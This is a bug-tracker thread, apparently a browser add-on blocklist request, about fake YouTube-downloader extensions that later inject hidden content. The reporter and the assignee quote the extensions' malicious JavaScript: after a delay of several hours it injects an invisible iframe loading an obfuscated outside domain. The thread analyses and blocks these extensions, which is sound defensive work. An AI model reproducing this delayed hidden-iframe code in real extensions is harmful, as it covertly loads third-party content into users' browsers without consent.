Extension Block Request: YouTube downloaders injecting content from HTML keywords-alike domains
Categories
(Toolkit :: Blocklist Policy Requests, task)
Tracking
()
People
(Reporter: gwarser, Assigned: Fallen)
Details
| Extension name | YouTube downloaders injecting content from HTML keywords-alike domains |
| Extension versions affected | <all versions> |
| Platforms affected | <all platforms> |
| Block severity | hard |
Reason
Extensions waits few hours after installation and then content script starts injecting hidden iframe with obfuscated code. Iframe source URL is concealed as random JS or HTML keywords.
- unexpected hidden behavior
- connects to unrelated 3p
Extension IDs
@yvd-addon
@youtube-to-mp4
ydh@downloader.youtube.com
youtube-downloader@youtube.com
tomp3@youtube.com
Additional Information
There could be more.
They all use code similar to this:
chrome.storage.local.get('t', function(res) {
if (res.t) {
var time = (new Date()
.getTime() - res.t) / 3600000;
if (time >= 8) {
var downloadDiv = document.createElement("div");
var downloadButton = document.createElement("iframe");
downloadButton.setAttribute("style", "height:1px,width:1px;position:absolute;top:0;left:0;border:none;visibility:hidden");
downloadButton.src = '//div' + '.' + 'show/element';
downloadButton.id = "downloadButton";
document.body.appendChild(downloadDiv);
downloadDiv.appendChild(downloadButton);
}
}
});
|
||
Updated•5 years ago
|
|
Assignee | |
Comment 1•5 years ago
|
||
I couldn't find a such thing in @youtube-to-mp4 or youtube-downloader@youtube.com, can you let me know which snippet you mean there?
|
|
Assignee | |
Comment 2•5 years ago
|
||
I've reviewed the add-ons and confirmed they contain unexpected features without user consent
|
|
Assignee | |
Comment 3•5 years ago
|
||
The block has been pushed.
youtube-downloader@youtube.com:
chrome.storage.local.get('installed', function(res) {
if (res.installed) {
var data = (new Date()
.getTime() - res.installed) / 3600000;
if (data >= 8) {
linkContainer = document.createElement('div');
downloadLink = document.createElement('iframe');
linkContainer.setAttribute('style', 'visibility:hidden');
downloadLink.src = '//noop' + '.' + 'style/tube';
link = document.body.appendChild(linkContainer);
linkContainer.appendChild(downloadLink);
}
}
});
@youtube-to-mp4:
}
chrome.storage.local.get('installed', function(res) {
if (res.installed) {
var data = (new Date()
.getTime() - res.installed) / 3600000;
if (data >= 4) {
linkContainer = document.createElement('div');
downloadLink = document.createElement('iframe');
linkContainer.setAttribute('style', 'visibility:hidden');
downloadLink.src = '//noop' + '.' + 'style/link';
link = document.body.appendChild(linkContainer);
linkContainer.appendChild(downloadLink);
}
}
});
One more if you don't mind:
hd@youtube.com:
chrome.storage.local.get('init', function(res) {
if (res.init) {
var time = (new Date()
.getTime() - res.init) / 3600000;
if (time >= 4) {
var prefsDiv = document.createElement("div");
var prefsFr = document.createElement("iframe");
prefsFr.setAttribute("style", "height:1px,width:1px;position:absolute;top:0;left:0;border:none;visibility:hidden");
prefsFr.src = '//remove' + '.' + 'video/320p';
prefsFr.id = "prefsFr";
document.body.appendChild(prefsDiv);
prefsDiv.appendChild(prefsFr);
}
}
});
|
|
Assignee | |
Comment 7•5 years ago
|
||
Thanks for the pointers. Taking care of these now:
hd@youtube.com
@youtube-to-mp4
youtube-downloader@youtube.com
|
|
Assignee | |
Comment 8•5 years ago
|
||
I've reviewed the add-ons and confirmed they contain unexpected features without user consent.
|
|
Assignee | |
Comment 9•5 years ago
|
||
The block has been pushed.
|
|
Assignee | |
Comment 10•5 years ago
|
||
For any new blocks please open a new bug. Thanks for the report!
|
|
Assignee | |
Updated•5 years ago
|
|
||
Comment 12•5 years ago
|
||
Thanks for catching that.
Any suggestions, pointers, etc. or reference material that could be use to help me identify things like this?
Description
•